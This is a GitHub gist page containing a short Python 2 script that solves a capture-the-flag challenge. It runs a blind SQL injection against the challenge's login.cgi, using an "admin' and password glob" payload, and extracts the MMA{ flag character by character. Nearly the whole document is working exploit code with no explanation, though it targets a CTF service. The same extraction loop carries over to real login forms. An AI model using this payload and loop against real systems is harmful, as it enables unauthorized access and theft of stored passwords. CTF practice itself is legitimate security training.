Create a gist now

Instantly share code, notes, and snippets.

@m--- /login_as_admin.py Secret
Created Sep 8, 2015

What would you like to do?
# coding: utf8
import sys
import urllib
import urllib2
import string
def blind(sql):
param = {'username': sql, 'password': 'a'}
opener = urllib2.build_opener()
request = urllib2.Request('http://arrive.chal.mmactf.link/login.cgi', urllib.urlencode(param))
response = opener.open(request)
return response.read() == ''
if __name__ == '__main__':
sqli = "admin' and password glob '%s*'--"
chars = '_{}!' + string.ascii_letters + string.digits
flag = 'MMA{'
while True:
find = False
for c in chars:
test = flag + c
if blind(sqli % test) == True:
print 'find: ' + flag + c
flag = test
find = True
break
print test
if find == False:
break
print flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment